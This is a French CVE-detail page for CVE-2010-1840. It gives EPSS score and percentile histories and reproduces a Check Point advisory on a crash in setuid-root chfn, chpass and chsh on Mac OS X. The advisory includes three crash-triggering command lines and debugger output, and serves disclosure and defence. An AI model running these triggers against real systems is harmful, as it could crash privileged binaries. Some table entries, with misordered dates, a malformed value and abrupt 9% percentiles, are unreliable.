CVE-2010-1840 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	5.94%	–	–
2022-02-13	–	–	5.94%	–	–
2022-04-03	–	–	5.94%	–	–
2023-02-26	–	–	5.94%	–	–
2023-03-12	–	–	–	6.53%	–
2023-03-26	–	–	–	8.96%	–
2023-05-21	–	–	–	16.8%	–
2023-07-09	–	–	–	19.33%	–
2023-08-27	–	–	–	15.15%	–
2023-10-15	–	–	–	14.63%	–
2024-02-11	–	–	–	14.63%	–
2024-06-02	–	–	–	14.63%	–
2024-10-06	–	–	–	13.86%	–
2024-11-17	–	–	–	20.85%	–
2024-12-22	–	–	–	17.49%	–
2025-02-23	–	–	–	13.94%	–
2025-01-19	–	–	–	17.49%	–
2025-02-23	–	–	–	13.94%	–
2025-03-18	–	–	–	–	5.53%
2025-03-30	–	–	–	–	5.53%
2025-03-30	–	–	–	–	5.53,%

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Date	Percentile
2022-02-06	77%
2022-02-13	78%
2022-04-03	9%
2023-02-26	91%
2023-03-12	93%
2023-03-26	94%
2023-05-21	95%
2023-07-09	96%
2023-08-27	95%
2023-10-15	95%
2024-02-11	96%
2024-06-02	96%
2024-10-06	96%
2024-11-17	97%
2024-12-22	96%
2025-02-23	96%
2025-01-19	96%
2025-02-23	96%
2025-03-18	9%
2025-03-30	89%
2025-03-30	89%

Apple Directory Services Memory Corruption CVE-2010-1840 INTRODUCTION chfn, chpass and chsh dos not properly parse authname switch ("-u"), which causes the applications to crash when parsing a long string. Those binaries are setuid root by default. This problem was confirmed in the following versions of Apple binaries and MacOS, other versions may be also affected: Apple Mac OS X 10.5.8 32bits /usr/bin/chfn, /usr/bin/chpass, /usr/bin/chsh Apple Mac OS X 10.6.2 64bits /usr/bin/chfn, /usr/bin/chpass, /usr/bin/chsh CVSS Scoring System The CVSS score is: 3.3 Base Score: 4.2 Temporal Score: 3.3 We used the following values to calculate the scores: Base score is: AV:L/AC:L/Au:R/C:C/I:C/A:C Temporal score is: E:POC/RL:OF/RC:C TRIGGERING THE PROBLEM /usr/bin/chfn -u `perl -e 'print "A" x 3000'` /usr/bin/chsh -u `perl -e 'print "A" x 3000'` /usr/bin/chpass -u `perl -e 'print "A" x 3000'` DETAILS Disassembly: 0x92237215 <CFArrayGetValueAtIndex+101>: mov $0x28,%al 0x92237217 <CFArrayGetValueAtIndex+103>: cmp $0xc,%ecx 0x9223721a <CFArrayGetValueAtIndex+106>: mov $0x14,%dl 0x9223721c <CFArrayGetValueAtIndex+108>: cmovne %edx,%eax 0x9223721f <CFArrayGetValueAtIndex+111>: add %esi,%eax 0x92237221 <CFArrayGetValueAtIndex+113>: mov 0xc(%ebp),%edx 0x92237224 <CFArrayGetValueAtIndex+116>: lea (%eax,%edx,4),%eax 0x92237227 <CFArrayGetValueAtIndex+119>: mov (%eax),%eax <----- Crash here. (gdb) x/i $pc 0x92237227 <CFArrayGetValueAtIndex+119>: mov (%eax),%eax (gdb) i r $eax eax 0x585d910 92657936 (gdb) bt #0 0x92237227 in CFArrayGetValueAtIndex () #1 0x9225c46b in _CFBundleTryOnePreferredLprojNameInDirectory () #2 0x9225d80c in _CFBundleAddPreferredLprojNamesInDirectory () #3 0x9224b7b0 in _CFBundleGetLanguageSearchList () #4 0x9225d8da in _CFBundleAddPreferredLprojNamesInDirectory () #5 0x9224b7b0 in _CFBundleGetLanguageSearchList () #6 0x9225b50c in CFBundleCopyResourceURL () #7 0x9225bb32 in CFBundleCopyLocalizedString () #8 0x903633eb in _ODNodeSetCredentials () #9 0x90369813 in ODRecordSetNodeCredentials () #10 0x000044be in ?? () #11 0x000026ac in ?? () #12 0x000022ee in ?? () The MacOS Heap Protection mechanisms mitigates the impact of this vulnerability. CREDITS This vulnerability was researched by Rodrigo Rubira Branco from Check Point Vulnerability Discovery Team (VDT). ACKNOWLEDGES Many thanks to Rafael Silva who brought the issue in chfn binary to our attention. -- Rodrigo Rubira Branco Senior Security Researcher Vulnerability Discovery Team (VDT) Check Point Software Technologies http://www.checkpoint.com/defense